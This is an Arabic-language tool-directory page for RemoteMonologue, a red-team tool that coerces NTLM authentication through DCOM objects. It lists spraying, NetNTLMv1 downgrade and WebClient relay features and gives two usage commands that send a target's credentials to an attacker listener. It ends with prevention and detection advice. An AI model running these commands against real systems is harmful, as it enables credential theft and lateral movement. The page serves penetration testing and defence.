Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RemoteMonologue — تسليح DCOM لإجبار مصادقات NTLM | Kitploit
أدوات/GitHubGitHub/xforcered/remotemonologue
هجمات كلمات المرورالاستغلالالحركة الجانبيةجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubxforcered/remotemonologue

RemoteMonologue

تسليح DCOM لإجبار مصادقات NTLM

عرض المستودع
27522منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RemoteMonologue

RemoteMonologue هي تقنية لجمع بيانات الاعتماد في ويندوز تتيح اختراق المستخدمين عن بُعد عبر استغلال مفتاح Interactive User RunAs وإجبار مصادقات NTLM من خلال DCOM.

اقرأ مقال X-Force Red RemoteMonologue: تسليح DCOM لإجبار مصادقات NTLM للحصول على معلومات مفصلة.

الميزات

🔹 إجبار المصادقة عبر DCOM (-dcom)

  • يستهدف أربعة كائنات DCOM (ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) لتحفيز مصادقة NTLM ضد مستمع محدد (-auth-to).

🔹 رش بيانات الاعتماد (-spray)

  • يتحقق من صحة بيانات الاعتماد عبر أنظمة متعددة مع التقاط بيانات اعتماد المستخدمين أيضًا.

🔹 هجوم تخفيض مستوى NetNTLMv1 (-downgrade)

  • يجبر الأهداف على استخدام NTLMv1، مما يجعل كسر بيانات الاعتماد والترحيل أسهل.

🔹 استغلال خدمة WebClient (-webclient)

  • يقوم بتمكين خدمة WebClient لتسهيل إجبار المصادقة المستندة إلى HTTP.

🔹 تعداد المستخدمين (-query)

  • تحديد المستخدمين الذين لديهم جلسة نشطة على النظام الهدف.

ملاحظة: يلزم امتيازات المسؤول المحلي على النظام الهدف.

الإعداد

root@kitploit:~
pip install impacket

أمثلة

فيما يلي مثال على تشغيل RemoteMonologue مع هجوم تخفيض مستوى NetNTLMv1 أثناء استخدام Responder كمستمع. بشكل افتراضي، إذا لم يتم تحديد خيار DCOM، تستخدم الأداة كائن DCOM ServerDataCollectorSet.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

فيما يلي مثال آخر، هذه المرة يتم تنفيذ الهجوم باستخدام كائن DCOM FileSystemImage وتمكين خدمة WebClient للحصول على مصادقة HTTP، والتي يتم بعد ذلك ترحيلها إلى LDAP باستخدام ntlmrelayx.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

اعتبارات دفاعية

للحماية من هذه التقنيات واكتشافها، هناك العديد من الإجراءات الوقائية والكشفية التي يمكن تنفيذها.

الإجراءات الوقائية:

  1. تفعيل توقيع LDAP وربط القنوات: قم بتكوين فرض توقيع LDAP وربط القنوات على وحدات تحكم المجال لحماية نقطة نهاية LDAP من هجمات الترحيل. ملاحظة: سيتم فرض هذه الإعدادات افتراضيًا بدءًا من Windows Server 2025.

  2. الترقية إلى أحدث إصدارات ويندوز: قم بترقية الخوادم إلى Windows Server 2025 ومحطات العمل إلى Windows 11 الإصدار 24H2 للتخفيف من هجمات تخفيض مستوى NetNTLM، حيث تمت إزالة NTLMv1 في هذه الإصدارات.

  3. فرض توقيع SMB: قم بتمكين وفرض توقيع SMB على خوادم ويندوز لمنع هجمات ترحيل SMB.

  4. تنفيذ سياسات كلمات مرور قوية: فرض متطلبات كلمات مرور قوية لجعل هجمات كسر كلمات المرور أكثر صعوبة.

فرص الكشف:

  1. مراقبة الوصول عن بُعد إلى كائنات DCOM: تتبع الوصول إلى كائنات DCOM المتأثرة وخصائصها وأساليبها المحددة لتحديد النشاط غير المعتاد.

  2. مراقبة تعديلات السجل: راقب التغييرات على مفاتيح التسجيل RunAs وLmCompatibilityLevel.

  3. تتبع نشاط خدمة WebClient: راقب الحالات التي يتم فيها تمكين خدمة WebClient عن بُعد، حيث يُستخدم ذلك لتسهيل مصادقات NTLM المستندة إلى HTTP.

تنزيل الأداة